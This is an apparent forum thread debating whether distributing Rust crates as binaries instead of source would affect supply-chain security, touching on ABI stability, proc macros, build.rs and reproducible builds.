I don’t think it’s that much of a security nightmare: the basic trust assumption that people make about the packaging ecosystem (that they trust their upstreams) remains the same whether they pull source or binaries.
I think the bigger issues are probably stability and size: no stable ABI combined with Rust’s current release cadence means that every package would essentially need to be rebuilt every six weeks. That’s a lot of churn and a lot of extra index space.
> remains the same whether they pull source or binaries.
I don't think that's exactly true, it's definitely _easier_ to sneak something into a binary without people noticing than it is to sneak it into rust source, but there hasn't been an underhanded rust competition for a while so I guess it's hard to be objective about that.
Pretty much nobody does those two things at the same time:
- pulling dependencies with cargo
- auditing the source code of the dependencies they're building
You are either censoring and vetting everything or you're using dependencies from crates.io (ideally after you've done your due diligence on the crate), but should crates.io be compromised and inject malware in the crates' payload, I'm ready to bet nobody would notice for a long time.
I fully agree with GP that binary vs source code wouldn't change anything in practice.
> Pretty much nobody does those two things at the same time:
- pulling dependencies with cargo - auditing the source code of the dependencies they're building
Your “pretty much” is probably weaseling you out of any criticism here, but I fully disagree:
My IDE (rustrover) has “follow symbol” support, like every other IDE out there, and I regularly drill into code I’m calling in external crates. Like, just as often as my own code. I can’t imagine any other way of working: it’s important to read code you’re calling to understand it, regardless of whether it’s code made by someone else in the company, or someone else in the world.
My IDE’s search function shows all code from all crates in my dependencies. With everything equal regardless of whether it’s in my repo or not. It just subtly shades the external dependencies a slightly different color. I regularly look at a trait I need from another crate, and find implementations across my workspace and dependencies, including other crates and impls within the defining crate. Yes, this info is available on docs.rs but it’s 1000x easier to stay within my IDE, and the code itself is available right there inline, which is way more valuable than docs alone.
I think it’s insane to not read code you depend on.
Does this mean I’m “vetting” all the code I depend on? Of course not. But I’m regularly reading large chunks of it. And I suspect a large chunk of people work the way I do; There are a lot of eyeballs on public crates due to them being distributed as source, and this absolutely has a tangible impact on supply chain attacks.
> Does this mean I’m “vetting” all the code I depend on? Of course not.
Inspecting public facing parts of the code is one thing, finding nasty stuff obfuscated in a macro definition or in a Default or Debug implementation of a private type that nobody is ever going to check outside of auditors is a totally different thing.
> My IDE (rustrover) has “follow symbol” support
I don't know exactly how it works for RustRover, since I know Jetbrain has reimplemented some stuff on their own, but if it evaluates proc macros (like rust-analyzer) does, then by the time you step into the code it's too late, proc macros aren't sandboxed in any ways and your computer could be compromised already.
The point of my argument is not to say I’m vetting anything, but to say that there are tons of eyeballs on crates today, because of the fact that they are distributed as source and not a binary. It’s not a silver bullet but every little bit helps, every additional eyeball makes hiding things harder.
The original claim is that “pretty much no one” reads any of their dependencies, in order to support a claim that they should be distributed as binaries, meaning “if there was no source available at all in your IDE, it wouldn’t make a difference”, which is just a flatly wrong claim IMO.
A disagreement may be arising here about the definition of “audit” vs “reading” source code, but I’d argue it doesn’t matter for my point, which is that additional eyeballs matter for finding issues in dependencies, and seeing the source of your crates instead of a binary blob is essential for this.
> The original claim is that “pretty much no one” reads any of their dependencies,
No the claim is that very few people read the dependencies[1] enough to catch a malicious piece of code. And I stand by it. “Many eyeballs” is a much weaker guarantee when people are just doing “go to definition” from their code (for instance you're never gonna land on a build.rs file this way, yet they are likely the most critical piece of code when it comes to supply chain security).
[1] (on their machines, that is if you do that on github it doesn't count since you have no way to tell it's the same code)
> No the claim is that very few people read the dependencies[1] enough to catch a malicious piece of code.
You’re shifting around between reading enough to catch any issue (which I could easily do if a vulnerability was right there staring at me when I follow symbol) to catching all issues (like your comment about build.rs.) Please stick with one and avoid moving goal posts around.
There exists a category of dependency issues that I could easily spot in my everyday reading of my dependencies’ source code. It’s not all of them. Your claim is that I would spot zero of them, which is overly broad.
You’re also trying to turn this into a black-or-white issue, as if to say that if it isn’t perfect (ie. I don’t regularly look at build.rs), it isn’t worth anything, which is antithetical to good security. The more eyeballs the better, and the more opportunities to spot something awry, the better.
I'm not moving the goal post, a supply chain attack is an adversarial situation it is not about spotting an issue occurring at random, it is about spotting an issue specially crafted to avoid detection. So in practice you are either able to spot every kind of issues, or none of the relevant ones because if there's one kind that reliably slips through, then you can be certain that the attacker will focus on this kind and ignore the trivial to spot ones.
If anything, having access to the source code gives you an illusion of security, which is probably the worse place to be in.
The worse ecosystem when it comes to supply chain attacks is arguably the npm one, yet there anyone can see the source and there are almost two orders of magnitude more eyeballs.
In such an environment I’m doomed anyway, even if I’m vetting code. I don’t understand why the goal has to be “the ability to spot attacks specifically designed to prevent you from detecting.” For what you’re describing, there seems to be no hope at all.
It’s like if someone says “don’t pipe curl into bash to install software”, ok that may or may not be good advice. But then someone else says “yeah, I download the script first and give it a cursory glance to see what it’s doing”, wouldn’t you agree they’re marginally better off than the people who just do it blindly?
If not, maybe we just aren’t coming from any mutual shared experience. It seems flatly obvious to me that being able to read the code I’m running puts me in a better spot. Maybe we just fundamentally disagree.
> It’s like if someone says “don’t pipe curl into bash to install software”, ok that may or may not be good advice. But then someone else says “yeah, I download the script first and give it a cursory glance to see what it’s doing”, wouldn’t you agree they’re marginally better off than the people who just do it blindly?
I don't agree with your comparison, in this case it's more like downloading, then running it without having read it and then every once in a while look at a snippet containing a feature that interest you.
The comparison to “download the script and read it before you run it” would be to download the crate's repo, read it and then vendor the code you've read to use as a dependency, which is what I'd consider proper vetting (in this case the attacker would need to be much more sophisticated to avoid detection, it's still possible but in this case at least you've actually gained something), but it's a lot more work.
If you have reproducible builds it's no different. Without those binaries are a nightmare in that you can't easily link a given binary back to a given source snapshot. Deciding to trust my upstream is all well and good but if it's literally impossible to audit them that's not a good situation to be in.
I think it’s already probably a mistake to think that a source distribution consistently references a unique upstream source repository state; I don't believe the crate distribution layout guarantees this.
(I agree that source is easier to review and establish trust in; the observation is that once you read the upstream source you’re in the same state regarding distributors, since build and source distributions both modify the source layout.)
It might as well. If there is no definition of an ABI, nobody is going to build the tooling and infrastructure to detect ABI compatibility between releases and leverage that for the off-chance that e.g. 2 out of 10 successive Rust releases are ABI compatible.
You can have binary dependencies with a stable ABI; they're called C-compatible shared libs, provided by your system package manager. And Cargo can host *-sys packages that define Rust bindings to these shared libs. Yes, you give up on memory safety across modules, but that's what things like the WASM Components proposals are for. It's a whole other issue that has very little to do with ensuring safety within a single build.
I think the bigger issues are probably stability and size: no stable ABI combined with Rust’s current release cadence means that every package would essentially need to be rebuilt every six weeks. That’s a lot of churn and a lot of extra index space.